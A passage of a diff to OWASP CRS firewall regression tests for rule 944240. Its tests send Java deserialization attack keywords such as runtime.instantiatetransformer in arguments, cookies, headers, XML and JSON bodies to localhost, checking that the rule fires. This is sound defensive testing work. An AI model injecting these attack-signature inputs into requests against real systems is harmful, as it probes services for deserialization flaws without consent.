"HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 17 desc: "XML attribute value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 18 desc: "XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 19 desc: "Nested XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 20 desc: "Content-Type text/plain includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.forclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.forclosure\"}" + output: + log: + expect_ids: [944240] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.forclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.forclosure\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 23 desc: "Argument test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 24 desc: "Argument name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory=test" + output: + log: + expect_ids: [944240] + - test_id: 25 desc: "Cookie test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 26 desc: "Cookie name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 27 desc: "Request header test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 28 desc: "XML attribute value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 29 desc: "XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 30 desc: "Nested XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 31 desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 32 desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatefactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatefactory\"}" + output: + log: + expect_ids: [944240] + - test_id: 33 desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.instantiatefactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 34 desc: "Argument test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 35 desc: "Argument name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 36 desc: "Cookie test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 37 desc: "Cookie name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 38 desc: "Request header test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 39 desc: "XML attribute value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 40 desc: "XML element value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 41 desc: "Nested XML element value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 42 desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 43 desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatetransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: 